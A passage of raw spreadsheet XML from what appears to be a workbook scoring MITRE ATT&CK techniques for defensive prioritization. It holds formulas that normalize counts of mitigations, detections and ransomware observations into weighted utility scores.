        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.48739639929771433</v>
      </c>
      <c r="B16" s="25">
        <f>SUM(H16,M16,V16)*(1+SUM(AE16,AG16,AI16,AK16,AM16))</f>
        <v>1.5406306596438097</v>
      </c>
      <c r="C16" s="25" t="s">
        <v>147</v>
      </c>
      <c r="D16" s="25" t="s">
        <v>148</v>
      </c>
      <c r="E16" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F16" s="51">
        <v>2</v>
      </c>
      <c r="G16" s="51">
        <v>1</v>
      </c>
      <c r="H16" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.15000000000000002</v>
      </c>
      <c r="I16">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J16">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K16">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L16">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M16" s="44">
        <v>0.77288590999999995</v>
      </c>
      <c r="N16" s="51">
        <v>0</v>
      </c>
      <c r="O16" s="51">
        <v>62</v>
      </c>
      <c r="P16" s="51">
        <v>5</v>
      </c>
      <c r="Q16" s="51">
        <v>3</v>
      </c>
      <c r="R16" s="53" t="s">
        <v>149</v>
      </c>
      <c r="S16" s="51">
        <v>5</v>
      </c>
      <c r="T16" s="51" t="s">
        <v>150</v>
      </c>
      <c r="U16" s="51">
        <v>6</v>
      </c>
      <c r="V16" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.43809523809523809</v>
      </c>
      <c r="W16">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>11</v>
      </c>
      <c r="X16">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.2</v>
      </c>
      <c r="Y16">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.2</v>
      </c>
      <c r="Z16">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>70</v>
      </c>
      <c r="AA16">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.7</v>
      </c>
      <c r="AB16">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.7</v>
      </c>
      <c r="AC16" s="29" t="s">
        <v>122</v>
      </c>
      <c r="AD16" s="25" t="str" cm="1">
        <f t="array" ref="AD16">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC16)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AE16" s="25">
        <f>IF(AD16="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0</v>
      </c>
      <c r="AF16" s="25" t="str" cm="1">
        <f t="array" ref="AF16">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC16)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG16" s="25">
        <f>IF(AF16="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH16" s="25" t="str" cm="1">
        <f t="array" ref="AH16">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC16)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI16" s="25">
        <f>IF(AH16="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ16" s="25" t="str" cm="1">
        <f t="array" ref="AJ16">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC16)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK16" s="25">
        <f>IF(AJ16="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL16" s="25" t="str" cm="1">
        <f t="array" ref="AL16">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC16)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM16" s="25">
        <f>IF(AL16="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN16" s="58">
        <v>10</v>
      </c>
      <c r="AO16" s="51">
        <v>1</v>
      </c>
      <c r="AP16" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.48739639929771433</v>
      </c>
      <c r="AQ16" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.51354355321460321</v>
      </c>
      <c r="AR16" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.51354355321460321</v>
      </c>
      <c r="AS16" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.47619047619047616</v>
      </c>
      <c r="AT16" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.47619047619047616</v>
      </c>
      <c r="AU1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7" spans="1:47" ht="32.1">
      <c r="A17" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.1008086670062857</v>
      </c>
      <c r="B17" s="25">
        <f>SUM(H17,M17,V17)*(1+SUM(AE17,AG17,AI17,AK17,AM17))</f>
        <v>1.008086670062857</v>
      </c>
      <c r="C17" s="25" t="s">
        <v>151</v>
      </c>
      <c r="D17" s="25" t="s">
        <v>152</v>
      </c>
      <c r="E17" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F17" s="51">
        <v>1</v>
      </c>
      <c r="G17" s="51">
        <v>1</v>
      </c>
      <c r="H17" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.1</v>
      </c>
      <c r="I17">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.1</v>
      </c>
      <c r="J17">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="K17">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.1</v>
      </c>
      <c r="L17">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.1</v>
      </c>
      <c r="M17" s="44">
        <v>0.69861753999999998</v>
      </c>
      <c r="N17" s="51">
        <v>0</v>
      </c>
      <c r="O17" s="51">
        <v>3</v>
      </c>
      <c r="P17" s="51">
        <v>6</v>
      </c>
      <c r="Q17" s="51">
        <v>0</v>
      </c>
      <c r="R17" s="51"/>
      <c r="S17" s="51">
        <v>0</v>
      </c>
      <c r="T17" s="51"/>
      <c r="U17" s="51">
        <v>0</v>
      </c>
      <c r="V17" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>4.2857142857142851E-2</v>
      </c>
      <c r="W17">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>0</v>
      </c>
      <c r="X17">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0</v>
      </c>
      <c r="Y17">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="Z17">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>9</v>
      </c>
      <c r="AA17">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.09</v>
      </c>
      <c r="AB17">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.09</v>
      </c>
      <c r="AC17" s="29" t="s">
        <v>153</v>
      </c>
      <c r="AD17" s="25" t="str" cm="1">
        <f t="array" ref="AD17">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC17)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE17" s="25">
        <f>IF(AD17="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF17" s="25" t="str" cm="1">
        <f t="array" ref="AF17">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC17)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AG17" s="25">
        <f>IF(AF17="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH17" s="25" t="str" cm="1">
        <f t="array" ref="AH17">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC17)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AI17" s="25">
        <f>IF(AH17="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0</v>
      </c>
      <c r="AJ17" s="25" t="str" cm="1">
        <f t="array" ref="AJ17">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC17)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK17" s="25">
        <f>IF(AJ17="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL17" s="25" t="str" cm="1">
        <f t="array" ref="AL17">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC17)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM17" s="25">
        <f>IF(AL17="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN17" s="52">
        <v>0</v>
      </c>
      <c r="AO17" s="51">
        <v>0</v>
      </c>
      <c r="AP17" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.1008086670062857</v>
      </c>
      <c r="AQ17" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.33602889002095232</v>
      </c>
      <c r="AR17" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.33602889002095232</v>
      </c>
      <c r="AS17" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0</v>
      </c>
      <c r="AT17" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0</v>
      </c>
      <c r="AU1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8" spans="1:47" ht="80.099999999999994">
      <c r="A18" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.31833951273</v>
      </c>
      <c r="B18" s="25">
        <f>SUM(H18,M18,V18)*(1+SUM(AE18,AG18,AI18,AK18,AM18))</f>
        <v>1.8500617939666668</v>
      </c>
      <c r="C18" s="25" t="s">
        <v>154</v>
      </c>
      <c r="D18" s="25" t="s">
        <v>155</v>
      </c>
      <c r="E18" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F18" s="51">
        <v>5</v>
      </c>
      <c r="G18" s="51">
        <v>3</v>
      </c>
      <c r="H18" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.4</v>
      </c>
      <c r="I18">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.5</v>
      </c>
      <c r="J18">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="K18">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.3</v>
      </c>
      <c r="L18">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.3</v>
      </c>
      <c r="M18" s="44">
        <v>0.69578580999999995</v>
      </c>
      <c r="N18" s="51">
        <v>4</v>
      </c>
      <c r="O18" s="51">
        <v>24</v>
      </c>
      <c r="P18" s="51">
        <v>9</v>
      </c>
      <c r="Q18" s="51">
        <v>5</v>
      </c>
      <c r="R18" s="52" t="s">
        <v>156</v>
      </c>
      <c r="S18" s="51">
        <v>2</v>
      </c>
      <c r="T18" s="51" t="s">
        <v>157</v>
      </c>
      <c r="U18" s="51">
        <v>8</v>
      </c>
      <c r="V18" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.29523809523809524</v>
      </c>
      <c r="W18">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>10</v>
      </c>
      <c r="X18">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Y18">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.18181818181818182</v>
      </c>
      <c r="Z18">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>42</v>
      </c>
      <c r="AA18">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.42</v>
      </c>
      <c r="AB18">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.42</v>
      </c>
      <c r="AC18" s="29" t="s">
        <v>158</v>
      </c>
      <c r="AD18" s="25" t="str" cm="1">
        <f t="array" ref="AD18">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC18)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE18" s="25">
        <f>IF(AD18="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF18" s="25" t="str" cm="1">
        <f t="array" ref="AF18">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC18)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG18" s="25">
        <f>IF(AF18="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH18" s="25" t="str" cm="1">
        <f t="array" ref="AH18">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC18)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI18" s="25">
        <f>IF(AH18="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ18" s="25" t="str" cm="1">
        <f t="array" ref="AJ18">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC18)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK18" s="25">
        <f>IF(AJ18="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL18" s="25" t="str" cm="1">
        <f t="array" ref="AL18">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC18)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM18" s="25">
        <f>IF(AL18="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN18" s="60">
        <v>4</v>
      </c>
      <c r="AO18" s="51">
        <v>1</v>
      </c>
      <c r="AP18" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.31833951273</v>
      </c>
      <c r="AQ18" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.61668726465555557</v>
      </c>
      <c r="AR18" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.61668726465555557</v>
      </c>
      <c r="AS18" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AT18" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>0.19047619047619047</v>
      </c>
      <c r="AU1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9" spans="1:47" ht="32.1">
      <c r="A19" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.21228888251666667</v>
      </c>
      <c r="B19" s="25">
        <f>SUM(H19,M19,V19)*(1+SUM(AE19,AG19,AI19,AK19,AM19))</f>
        <v>1.4562221585000001</v>
      </c>
      <c r="C19" s="25" t="s">
        <v>159</v>
      </c>
      <c r="D19" s="25" t="s">
        <v>160</v>
      </c>
      <c r="E19" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F19" s="51">
        <v>2</v>
      </c>
      <c r="G19" s="51">
        <v>2</v>
      </c>
      <c r="H19" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.2</v>
      </c>
      <c r="I19">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.2</v>
      </c>
      <c r="J19">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="K19">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.2</v>
      </c>
      <c r="L19">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.2</v>
      </c>
      <c r="M19" s="44">
        <v>0.66633244999999997</v>
      </c>
      <c r="N19" s="51">
        <v>0</v>
      </c>
      <c r="O19" s="51">
        <v>1</v>
      </c>
      <c r="P19" s="51">
        <v>3</v>
      </c>
      <c r="Q19" s="51">
        <v>2</v>
      </c>
      <c r="R19" s="52" t="s">
        <v>161</v>
      </c>
      <c r="S19" s="51">
        <v>7</v>
      </c>
      <c r="T19" s="52" t="s">
        <v>162</v>
      </c>
      <c r="U19" s="51">
        <v>14</v>
      </c>
      <c r="V19" s="25">
        <f>parameters!$J$4*Table1[[#This Row],[Mitigations Utility]] + parameters!$J$5*Table1[[#This Row],[Detections Utility]]</f>
        <v>0.22857142857142859</v>
      </c>
      <c r="W19">
        <f>SUM(Table1[[#This Row],[Num. 800-53 (r5)]],Table1[[#This Row],[Num. CIS Controls]])</f>
        <v>21</v>
      </c>
      <c r="X19">
        <f>(Table1[[#This Row],[Total Mitigations]]-parameters!$D$2)/(parameters!$D$3-parameters!$D$2)</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Y19">
        <f>IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Mitigations Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Mitigations Utility (unclipped)]]) )</f>
        <v>0.38181818181818183</v>
      </c>
      <c r="Z19">
        <f>SUM(Table1[[#This Row],[Num. CAR]:[Num. Splunk]])</f>
        <v>6</v>
      </c>
      <c r="AA19">
        <f>(Table1[[#This Row],[Total Detections]]-parameters!$D$4)/(parameters!$D$5-parameters!$D$4)</f>
        <v>0.06</v>
      </c>
      <c r="AB19">
        <f>IF(Table1[[#This Row],[Detections Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Detections Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Detections Utility (unclipped)]]) )</f>
        <v>0.06</v>
      </c>
      <c r="AC19" s="29" t="s">
        <v>163</v>
      </c>
      <c r="AD19" s="25" t="str" cm="1">
        <f t="array" ref="AD19">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Process","Command","Script","WMI","Module","Pipe","Service"},AC19)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AE19" s="25">
        <f>IF(AD19="1",'TOP 10 TECHNIQUES'!C$15,0)</f>
        <v>0.19800000000000001</v>
      </c>
      <c r="AF19" s="25" t="str" cm="1">
        <f t="array" ref="AF19">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Network","Firewall"},AC19)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AG19" s="25">
        <f>IF(AF19="1",'TOP 10 TECHNIQUES'!C$16,0)</f>
        <v>0</v>
      </c>
      <c r="AH19" s="25" t="str" cm="1">
        <f t="array" ref="AH19">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"File","Group","Logon","Schedule","User","Registry","Active","Application"},AC19)))))&gt;0,"1","0")</f>
        <v>1</v>
      </c>
      <c r="AI19" s="25">
        <f>IF(AH19="1",'TOP 10 TECHNIQUES'!C$17,0)</f>
        <v>0.13200000000000001</v>
      </c>
      <c r="AJ19" s="25" t="str" cm="1">
        <f t="array" ref="AJ19">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Cloud","Cluster","Container","Image","Instance","Pod","Snapshot","Volume"},AC19)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AK19" s="25">
        <f>IF(AJ19="1",'TOP 10 TECHNIQUES'!C$18,0)</f>
        <v>0</v>
      </c>
      <c r="AL19" s="25" t="str" cm="1">
        <f t="array" ref="AL19">IF(SUMPRODUCT(--(NOT(ISERR(SEARCH({"Drive","Firmware","Host","Kernel"},AC19)))))&gt;0,"1","0")</f>
        <v>0</v>
      </c>
      <c r="AM19" s="25">
        <f>IF(AL19="1",'TOP 10 TECHNIQUES'!C$19,0)</f>
        <v>0</v>
      </c>
      <c r="AN19" s="60">
        <v>2</v>
      </c>
      <c r="AO19" s="51">
        <v>1</v>
      </c>
      <c r="AP19" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.21228888251666667</v>
      </c>
      <c r="AQ19" s="25">
        <f>(Table1[[#This Row],[Total Top Att&amp;ck Score ]]-parameters!$D$19)/(parameters!$D$20-parameters!$D$19)</f>
        <v>0.48540738616666673</v>
      </c>
      <c r="AR19" s="25">
        <f>IF(Table1[[#This Row],[TAT Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[TAT Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[TAT Utility (unclipped)]]) )</f>
        <v>0.48540738616666673</v>
      </c>
      <c r="AS19" s="25">
        <f>(Table1[[#This Row],[Ransomware (Total '# of ATT&amp;CK Observations)]]-parameters!$D$21)/(parameters!$D$22-parameters!$D$21)</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AT19" s="25">
        <f>IF(Table1[[#This Row],[Count Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Count Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Count Utility (unclipped)]]) )</f>
        <v>9.5238095238095233E-2</v>
      </c>
      <c r="AU1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0" spans="1:47" ht="80.099999999999994">
      <c r="A20" s="25">
        <f>parameters!$J$21*Table1[[#This Row],[TAT Utility]]+parameters!$J$22*Table1[[#This Row],[Count Utility]]</f>
        <v>0.26196827460333333</v>
      </c>
      <c r="B20" s="25">
        <f>SUM(H20,M20,V20)*(1+SUM(AE20,AG20,AI20,AK20,AM20))</f>
        <v>1.9530160793666669</v>
      </c>
      <c r="C20" s="25" t="s">
        <v>164</v>
      </c>
      <c r="D20" s="25" t="s">
        <v>165</v>
      </c>
      <c r="E20" s="25" t="s">
        <v>89</v>
      </c>
      <c r="F20" s="51">
        <v>4</v>
      </c>
      <c r="G20" s="51">
        <v>5</v>
      </c>
      <c r="H20" s="25">
        <f>parameters!$J$10*Table1[[#This Row],[Before Utility]]+parameters!$J$11*Table1[[#This Row],[After Utility]]</f>
        <v>0.45</v>
      </c>
      <c r="I20">
        <f>(Table1[[#This Row],[Num. TID Before]]-parameters!$D$8)/(parameters!$D$9-parameters!$D$8)</f>
        <v>0.4</v>
      </c>
      <c r="J20">
        <f>IF(Table1[[#This Row],[Before Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[Before Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[Before Utility (unclipped)]]))</f>
        <v>0.4</v>
      </c>
      <c r="K20">
        <f>(Table1[[#This Row],[Num. TID After]]-parameters!$D$10)/(parameters!$D$11-parameters!$D$10)</f>
        <v>0.5</v>
      </c>
      <c r="L20">
        <f>IF(Table1[[#This Row],[After Utility (unclipped)]]&gt;1,1, IF(Table1[[#This Row],[After Utility (unclipped)]]&lt;0,0, Table1[[#This Row],[After Utility (unclipped)]]))</f>
        <v>0.5</v>
      </c>
      <c r="M20" s="44">
        <v>0.66605219000000004</v>
      </c>
      <c r="N20" s="51">
        <v>1</v>
      </c>
      <c r="O20" s="51">
        <v>5</v>
      </c>
      <c r="P20" s="51">
        <v>28</v>
      </c>
      <c r="Q20" s="51">
        <v>2</v>
      </c>
      <c r="R20" s="53" t="s">
        <v>166</v>
      </c>
      <c r="S20" s="51">
        <v>7</v>
      </c>
      <c r="T20" s="51" t="s">
        <v>167</v>
      </c>
      <c r="U20" s="51">
        <v>12</v>
      </c>
      <c r="V20" s="25">
